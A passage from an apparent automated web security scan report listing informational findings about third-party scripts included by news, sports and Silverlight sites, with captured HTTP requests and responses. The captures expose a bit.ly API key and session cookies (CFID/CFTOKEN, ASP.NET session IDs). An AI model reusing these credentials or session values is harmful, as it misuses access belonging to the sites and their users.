Expires: Sun, 30 Jan 2011 02:01:03 GMT
Last-UpdatedL: Sun, 30 Jan 2011 01:45:03 GMT
Age: 134
Vary: Accept-Encoding
Content-Length: 84634
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: SSLB=A;path=/;domain=www.reuters.com;




<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d821869/2/822749/randm.js"></script>
...[SNIP]...

23.577. http://www.sciencenews.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sciencenews.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: www.sciencenews.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.578. http://www.scientificamerican.com/blog/observations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/blog/observations/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/APIModules_all.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://bit.ly/javascript-api.js?version=1.02&login=sciam&apiKey=R_4f0af26579dbeb7e65abbf25664a9b49&history=1
http://edge.quantserve.com/quant.js

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211547;path=/
Set-Cookie: CFTOKEN=84610132;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70039
Date: Sat, 29 Jan 2011 22:32:21 GMT
X-Varnish: 461255158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
 <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script> <script src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
</h3>
       <script src="http://bit.ly/javascript-api.js?version=1.02&login=sciam&apiKey=R_4f0af26579dbeb7e65abbf25664a9b49&history=1"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.579. http://www.scientificamerican.com/errors/404.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/errors/404.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=1.02&login=sciam&apiKey=R_4f0af26579dbeb7e65abbf25664a9b49&history=1
http://edge.quantserve.com/quant.js

Request

Response

HTTP/1.1 404 Page not found
Server: Apache
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D30%2012%3A14%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D3%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 17:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 57499
Date: Sun, 30 Jan 2011 17:14:49 GMT
X-Varnish: 1916371499
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
   
   <title>Page not found--/errors/404.cfm? : Scientific American</title>
   <meta charset="utf-8" />
   <meta name="description" conte
...[SNIP]...
</h3>
       <script src="http://bit.ly/javascript-api.js?version=1.02&login=sciam&apiKey=R_4f0af26579dbeb7e65abbf25664a9b49&history=1"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.580. http://www.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js
http://poll.websitegear.com/compactpoll.asp?pollID=18182

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:25:49 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:35:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:54:38 GMT
ETag: "1CBC00FE3423300"
Content-Type: text/html
Content-Length: 99726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com - College and High School Football, Basketball, Recruiti
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://poll.websitegear.com/compactpoll.asp?pollID=18182"></script>
...[SNIP]...

23.581. http://www.scout.com/3/college-links.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/college-links.html

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12628

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.582. http://www.scout.com/3/company.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/company.html

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14472

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Company Overview</title>
<meta http-equiv
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.583. http://www.scout.com/3/fair-use.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/fair-use.html

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:39 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13618

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Fair Use</title>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.584. http://www.scout.com/3/jobs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/jobs.html

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:51 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18927

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Jobs at Scout.com</title>
<meta http-equi
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.585. http://www.scout.com/3/privacy-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/privacy-policy.html

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:24 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36135

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.586. http://www.scout.com/3/recruiting-links.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/recruiting-links.html

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12567

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.587. http://www.scout.com/3/security-information.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/security-information.html

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13553

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Security Information</title>
<meta http-e
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.588. http://www.scout.com/3/terms-of-service.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/terms-of-service.html

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

23.589. http://www.scout.com/a.z previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/a.z

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

GET /a.z HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:27:22 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:22 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.590. http://www.scout.com/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/search.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

Response

23.591. http://www.scout.com/widgets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/widgets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:27 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:27 GMT
Last-Modified: Fri, 28 Jan 2011 00:49:27 GMT
ETag: "1CBBE8536D44580"
Content-Type: text/html
Content-Length: 14619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.592. http://www.signonsandiego.com/news/blogs/science-quest/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.signonsandiego.com
Path:	/news/blogs/science-quest/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences_all.js
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/swfobject/2/swfobject.js
http://d.yimg.com/ds/badge2.js
http://js.zvents.com/javascripts/happy_partner_widgets.js
http://js.zvents.com/javascripts/partner_widgets/ZventsEventListLayout1.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://widgets.twimg.com/j/2/widget.js
http://www.stumbleupon.com/hostedbadge.php?s=1

Request

GET /news/blogs/science-quest/ HTTP/1.1
Host: www.signonsandiego.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 03:20:02 GMT
ETag: "9c8550eb7d3bb13cfe45503c097b5a84"
Cache-Control: max-age=60
Last-Modified: Sun, 30 Jan 2011 03:19:02 GMT
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.10
Content-Length: 111080
Date: Sun, 30 Jan 2011 03:19:02 GMT
X-Varnish: 1618713280
Age: 0
Via: 1.1 varnish
Connection: close

<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<meta name="verify-v1" content="6ylWgY9aqB0mJpcLJKDC73
...[SNIP]...
</style>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
<script type="text/javascript" src="http://js.zvents.com/javascripts/happy_partner_widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="marB10">
<script src="http://www.stumbleupon.com/hostedbadge.php?s=1"></script>
...[SNIP]...
<div class="marB10">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text-votes">ARTICLEURL</script>
...[SNIP]...

<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2/swfobject.js"
type="text/javascript"></script>
...[SNIP]...
</h4>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="thingstodo_widget">
<script type="text/javascript" src="http://js.zvents.com/javascripts/partner_widgets/ZventsEventListLayout1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

23.593. http://www.silverlight.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET / HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:14:45 GMT
Content-Length: 43537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Home : The
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.594. http://www.silverlight.net/adchain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/adchain.html

Issue detail

The response dynamically includes the following script from another domain:

http://d2.zedo.com/jsc/d2/fo.js

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/devices/windows-phone/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:26 GMT
Content-Length: 531

<html><head></head><body><body bgcolor="#FFFFFF">
<script language="JavaScript">
var zflag_ni
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

23.595. http://www.silverlight.net/community/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76927
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.596. http://www.silverlight.net/community/blogarchive/silverlight/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/blogarchive/silverlight/1/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/blogarchive/silverlight/1/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24868
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Blog Archi
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.597. http://www.silverlight.net/community/recognition/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/recognition/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/recognition/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35852
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.598. http://www.silverlight.net/community/recognition/halloffame.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/recognition/halloffame.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/recognition/halloffame.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40688
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Hall Of Fa
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.599. http://www.silverlight.net/community/samples/featured/telerik-facedeck/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/featured/telerik-facedeck/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /community/samples/featured/telerik-facedeck/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24005
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:39:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Community
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.600. http://www.silverlight.net/community/samples/silverlight-samples/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/community/samples/silverlight-samples/

Issue detail

The response dynamically includes the following script from another domain:

